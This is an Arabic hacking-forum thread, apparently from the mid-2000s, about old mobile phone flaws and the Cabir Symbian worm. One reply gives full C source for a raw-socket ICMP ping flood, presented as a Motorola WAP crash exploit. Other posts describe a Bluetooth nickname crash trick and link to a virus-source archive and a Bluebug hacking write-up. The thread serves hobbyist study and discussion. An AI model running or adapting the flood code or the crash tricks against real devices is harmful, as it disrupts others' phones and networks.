JAAS

فايروسات وثغرات الأنظمة الكفية ( الجوال )

22 ردود في هذا الموضوع

مرحبا ,,,

في البداية هل توجد ثغرات في أنظمة الأجهزة الكفية ؟! وهل يمكن التأثير في هذة الأجهزة

هل توجد فايروسات لهذة الأنظمة ؟! وكيف تكتب وكيف تعمل ؟!

-

في هذا الموضوع سنأخذ فكرة بسيطة عن إختراق الجوال من خلال ثغرات النظام

بالإضافة إلى دراسة سطحية لأول فايروس كتب للجوال وهو الفايروس Cabir أو Caribe

أولاً : الثغرات

قبل سنتين تقريباً إنتشرت قصص خرافية عن فايروسات الجوال ؟! سمعت مثلا أنة بمجرد

إستقبال رسالة نصية يمكن تخريب جهازك الجوال وإختراقة , هل تصدق هذا الكلام ؟؟؟!

عن نفسي أصدقة 100% وليس فقط بمجرد إستقبال الرسالة حتى لو لم تستقبلهاوهذا مايسمى sms bomber

الثغرة الأولى وهي : SMS phone crash exploit a risk

http://www.theregister.co.uk/2001/11/28/ho..._crash_a_phone/

هذة الثغرة في أجهزة نوكيا القديمة 6210, 3310 و 3330

من إسم الثغرة هي عبارة عن رسالة sms يتم إنشائها من خلال برامج كمبيوتر ثم يتم إرسالها للرقم المستهدف

وبهذا يكون قد أخترق وتم تخريب الجهاز المستهدف ؟!

كيف تعمل الثغرة ؟! لفهم عمل الثغرة يتطلب الموضوع درس كامل عن برمجة رسائل sms ومما تتكون

ولكن بإختصار رسالة sms تحتوي في البداية على بلوك الرسالة هذا البلوك يحتوي على معلومات الرسالة

في هذا البلوك وجد أن النظام لايضع قيود تفصيلية لقرائة حجم كل معلومة في البلوك؟!

وبهذا فقد تم تصميم برامج مثل :

http://research.pestpatrol.com/Search/File...7a19436913fe810

هذة البرامج تنتج رسالة عبارة عن كود تنفيذي ؟! يتم نقل التحكم من بلوك المعلومات إلى الكود التنفيذي

ليتم بعد ذلك إطفاء وإعطاب نظام الجهاز بالكامل

----

ليس فقط خدمة رسائل SMS معرضة للثغرات وليست فقط أجهزة نوكيا ؟!

ثغرة خدمة WAP في أجهزة الموتورولا T720

هذة الثغرة شبيهة بأول ثغرة درسناها في أنظمة وندوز ؟! خطأ الفيض في المكدس

http://www.cellphonehacks.com/viewtopic.ph...=asc&highlight=

--

ثانياً : الفايروسات

أول فايروس كتب للجوال وأول شرح لة في المنتديات :)

الفايروس Cabir أو caribe يضرب هذا الفيروس أنظمة سيمبيان

هذا الفيروس ليس صعب وطريقة عملة ليست معقدة

بعد فك الضغط من الملف caribe.sis نجد بأن الفايروس ينقسم إلى 3 ملفات وهي :

الملف caribe.app والملف flo.mdl عبارة عن ملفين شفرة والملف الأخير caribe.rsc عبارة عن ملف بيانات

لو أردت أن تشاهد , هذا هو الفايروس بعد أن قمت بفك الملفات بداخل برنامج UnMakeSIS

aasnvs001.gif

-

المهم :

يصل الفايروس إلى جوالك من خلال البلوتوث ؟! عبارة عن رسالة أو ملف , بهذة الطريقة

bbsnvs002.gif

أول ما تشغل الفايروس وتقوم بتثبيتة يتم فك الضغط وكل ملف يأخذ مكانة

أولا:ً الملف flo.mdl

هذا الملف يأخذ المسار c:\system\recogs\flo.mdl

وضيفة هذا الملف هو تشغيل الفايروس في كل عملية بدأ للتشغيل

كيف ؟!

شغل برنامج الديبغر لمعالجات arm وهو البرنامج IDA pro وإختر الفايروس caribe.sis

تجد برنامج الديبغر أظهر لك نافذة يخبرك بوجود ملفين للتنفيذ

ccsnvs003.gif

إختر الملف الثاني ثم ok

الآن سنتأكد من عمل هذا الملف , وهل هو فعلا المسؤل عن تشغيل الفايروس في بدء التشغيل

أول شيء نبحث فية ( الدوال المستوردة ) لنرى

ddsnvs004.gif

بعد ذلك نتجة لعنوان الدالة

لنرى كيف تم تنفيذ وكتابة دوال تشغيل الفايروس

eesnvs005.gif

بعد ذلك يتم تشغيل الفايروس وهو الملف caribe.app

العمل الأساسي لهذا الفايروس وهو نشر نفسة عبر البلوتوث ؟! وهي عملية ليست معقدة

لاحظ عمل الدوال

ffsnvs006.gif

وبهذة الطريقة يتم إنتشار هذا الفايروس بين الأجهزة الكفية ؟!

وبعد أن ظهر هذا الفايروس ظهرت أدوات مكافحة لة مثل

http://www.f-secure.com/tools/f-cabir.sis

----------------------------------------

وفي النهاية توجد طرق أخرى لم نتطرق لها ,, كما أنة توجد فايروسات لأنظمة أخرى

مثلاُ

أول فايروس ظهر لأنظمة الوندوز ce وأجهزة PocketPC وهو الفايروس Duts

إذا كنتم مهتمين بهذة الأمور ( باب النقاش مفتوح )

وبالتوفيق ,,,

1

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

برنامج UnMakeSIS.exe

UnMakeSISv0.21.zip

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

متشكر يامشرف

ورجاء المتابعه بكل ماهو جديد

فى هذه المجالات

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

و الله الواحد مش عارف يشكرك أزاي على كل المعلومات القيمة الى بتقدمها لينا :)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

الله يعطيك العافية يا jaas

الشرح ممتاز

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

مشكور اخي العزيز jaas

موضوع جميل جدا ...

فلهواتف ( الجوالات ) من ناحيه الحمايه فهي ردييئه .. وتوجد بها الكثير من الاخطاء والمشاكل

ففي تاريخ 2005 اليوم 6 شهر مارس ..

اكتشفت خطء برمجي ضعف في البلوتوث يعمل على اعاده الاجهزه remote فقط بعرف ال nickname للهاتف ...

http://securitytracker.com/alerts/2005/Mar/1013380.html

هذه بعض المعلومات عن الثغره مع ال exploit لاخراج النك نيم ...

طريقه عمله سهله جدا جدا

بأننا نضيف قيمتان hex وهما

 09 0A

بعد وضع النك نيم ... ستضهر في الجوال مسافه .. عاديه ولا كأنها اي شئ .. ويجب ان تضيف بعد القيمه هذه اي حرف

لان جوالات symbian 60 تمسح المسافات الي لاتوجد بعدها حروف او قيم ...

هذه هي الثغره وبساطتها ..

قبل فتره كان عندي سورس كود فايروس كابر سوف ابحث عنه وان وجدته سو افضعه لكم هنا ...

واشكرك اخي jaas على المواضيع الجميله مره اخرى

تحياتي

تم تعديل بواسطه Qnix
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

فعلاً ثغرة رهيبة وذكية ؟!

إضافة قيمتين بالهكس تعيد تشغيل الجهاز ???

الظاهر ان مبرمجي نظام سمبيان لم يعالجو كل شفرات المفاتيح من 0 إلى FF

وإستكفوا بتعريف الأحرف والأرقام الموجودة في الجوال !!

قبل فتره كان عندي سورس كود فايروس كابر سوف ابحث عنه وان وجدته سو افضعه لكم هنا ...

فايروس كاربي ليس فايروس واحد ؟! الذي مر علي 8 أنواع

مثل هذا النوع الذي يضرب أجهزة السيارات ؟!! شوف وين وصلت التقنية

صورة:

lexus.jpg

-

إذا عندك أي شفرة لأي نوع شاركنا بها ,,,

وفي إنتظارمشاركاتك لأنة مبين عليك خبير :)

وبالتوفيق,,,

تم تعديل بواسطه jaas
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
ثغرة خدمة WAP  في أجهزة الموتورولا T720

هذة الثغرة شبيهة بأول ثغرة درسناها في أنظمة وندوز ؟!  خطأ الفيض في المكدس

http://www.cellphonehacks.com/viewtopic.ph...=asc&highlight=

--

السلام عليكم

اخى العزيز بالنسبه لثغره الWAP ليست فيض فى المكدس..

بال هى ثغره من نوع DOs تقوم بارسال packet عن طريق بروتكول مكدس ال tcp\ip فتقوم بغلق

الجهاز عندما الشخص يقوم بالاتصال عبر متصفح الWAP .

واعتقد ان لحد الان لم تظهر ثغره فيض فى المكدس , ولكن لا مانع من ظهورها فى برامج الmobile

مثل برامج الجافا .

وهذا كود ثغره الWAP

#include <stdio.h> 
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s <host>\n", argv[0]);
exit(0);
}

int sock;
char packet[5000];
int on = 1;
struct sockaddr_in dest;
struct hostent *host;
struct iphdr *ip = (struct iphdr *) packet;
struct icmphdr *icmp = (struct icmp *) packet
+ sizeof(struct iphdr);
if((host = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve host!\n");
exit(-1);
}

if((sock = socket(AF_INET, SOCK_RAW,
IPPROTO_ICMP)) == -1) {
printf("Couldn't make socket!\n");
printf("You must be root to create a
raw socket.\n");
exit(-1);
}

if((setsockopt(sock, IPPROTO_IP, IP_HDRINCL,
(char *)&on, sizeof(on))) < 0) {
perror("setsockopt");
exit(1);
}

dest.sin_family = AF_INET;
dest.sin_addr = *((struct in_addr
*)host->h_addr);
ip->ihl = 5;
ip->id = htons(1337);
ip->ttl = 255;
ip->tos = 0;
ip->protocol = IPPROTO_ICMP;
ip->version = 4;
ip->frag_off = 0;
ip->saddr = htons("1.3.3.7");
ip->daddr = inet_ntoa(dest.sin_addr);
ip->tot_len = sizeof(struct iphdr) +
sizeof(struct icmphdr);
ip->check = 0;
icmp->checksum = 0;
icmp->type = ICMP_ECHO;
icmp->code = 0;
printf("Ping flooding %s!\n", argv[1]);

/* begin flooding here. */
while(1) {
sendto(sock, packet, ip->tot_len, 0,
(struct sockaddr *)&dest, sizeof(struct sockaddr));
}
return(0);
}

والله اعلم

تم تعديل بواسطه احمد غريب
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

شكر لك اخي jaas واخي bigboss1988

اخي jaas كانت عندي السورسات وموجوده في النت بس إن شاء الله عطني وقت واجيبلك اياهم وبحاول اجيبلك غيرهم لو لقيت

انت غالي والطلب رخيص ...

تم تعديل بواسطه Qnix
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

اّسف اخي العزيز jaas على التأخر وهاذا هو الموقع الموجود فيه السورس كود

http://vx.netlux.org/29a/

هو موجود في issue #8 عاد انت وحضك :) لو لقيته في مكان ثاني ... وراح تحصل اشياااء جميله جدا جدا جدا في هاذا الموقع وبلاوي تتكلم عن الفايروسات وصنعها

وغيرها من هذه الاشياء :)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

ألف شكر أخي Qnix جاري النبش في الموقع

-

أخي bigboss1988 هل تعتمد على الموقع :)

http://www.securitylab.ru/43275.html

أنا قلت أنها ثغرة فيض لأن الكود واضح في الحجم الخيالي لترويسة ip أكيد ستحدث فيض في

متغير

المهم كل شيء جائز وباب النقاش مفتوح لمن لدية طريقة منطقية لحدوث الثغرة

وبالتوفيق

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
-

أخي bigboss1988  هل تعتمد على الموقع :)

http://www.securitylab.ru/43275.html

أنا قلت أنها ثغرة فيض لأن الكود واضح في الحجم الخيالي لترويسة ip  أكيد ستحدث فيض في

متغير

المهم كل شيء جائز  وباب النقاش مفتوح لمن لدية طريقة منطقية لحدوث الثغرة

السلام عليكم

انا ما اعتمد على شىء غير الله :)

حضرتك وضعت موقع الثغره بنفسك http://www.cellphonehacks.com/viewtopic.ph...=asc&highlight=

فهى كانت من نوع الDOS فى بروتكول الTCP/ip انصحك بمراجعت هذا البروتكول

وبالفعل ظهر buffer overflow فى برامج الbluetooth مثل

http://secunia.com/advisories/12275/ ولكن استغلالها لم اراه او لم يكتب لشده صعوبت

كتابته الله اعلم انا بخمن :) لانى سالت عن كتابه الفيروسات للموبايل بالجافا كان الرد

its too hard cuz java is sandBox

نسيت اشكرك يا Qnix على الثغره الجميله ;)

والله اعلم

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

السلام عليكم

اسف يا جماعه اظاهر انى رديت ب nikename اخويا احمد صالح

فانا اسلام صالح اخوه

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

بالنسبة لبرنامج UnmaskSis هل يوجد له تحديث او شئ من هذا القبيل لانه لا يعمل على ملفات sis معينة حيث لا يقوم الا باستخراج ملف واحد من كامل الحزمة

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

بالفعل أخي ech0 أدوات رائعة وجديدة !!!!!!

وبالنسبة للبرنامج unmakesis ظهر لة إصدار جديد ولكنة غير كامل

وهذة مجموعة الأدوات ومواقعها ( للتحديث )

http://www.nokiovo.it/utilita/utilita.htm

-

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

منذف فتره وجيزه قمت بكتابه موضوع يتحدث عن ثغره Bluebug

لاختراق الهواتف التي تدعم البلوتوث وبروتوكول Object Exchange - OBEX

واعتقد انه هو اول موضوع يتحدث بشكل خاص عنها وطريقه استغلالها

بحثت كثيرا في الكتب والمواقع لم اجد شئ يشرحها بشكل خاص فقط معلومات

بسيطه وما الى ذالك فقمت بكتابه هاذا الموضوع وكيفيه اختراقي لجوالي نوكيا 6600

عن طريقه القناه 9 وهي قناه OBEX Object Push

وصله الموضوع

http://www.0x11.org/bluebug.html

تم تعديل بواسطه Qnix
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

بسم الله الرحمن الرحيم

اخى qnix ارجو منك شرح المزيد حول هذه الثغره التى تقوم باختراق البلو توث

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

عندي امتحانات هاذا الاسبوع لكن اول ما اتفرغ راح اشرح الي اقدر عليه .

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

موقع متميز يا Q.. واسمه بعد احلى ;)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
زوار
This topic is now closed to further replies.

  • يستعرض القسم حالياً   0 members

    لا يوجد أعضاء مسجلين يشاهدون هذه الصفحة .